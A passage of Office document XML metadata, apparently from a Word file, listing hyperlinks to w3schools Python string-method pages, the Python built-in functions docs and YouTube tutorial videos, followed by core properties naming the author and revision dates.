      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_encode.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7471161</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_count.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6029327</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_center.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145853</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>21</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_casefold.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5898262</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_capitalize.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274531</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/python_ref_string.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963870</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.python.org/3/library/functions.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>65552</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=NpmFbWO6HPU&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=19&amp;pp=gAQBiAQB</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983074</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=bYYd_IlOb9k&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=12&amp;pp=gAQBiAQB</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2883694</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mrjq3lFz23s&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=8&amp;pp=gAQBiAQB</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6553704</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mMv6OSuitWw&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=7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Berlin Dot</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Berlin Lee</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-31T11:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-31T11:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>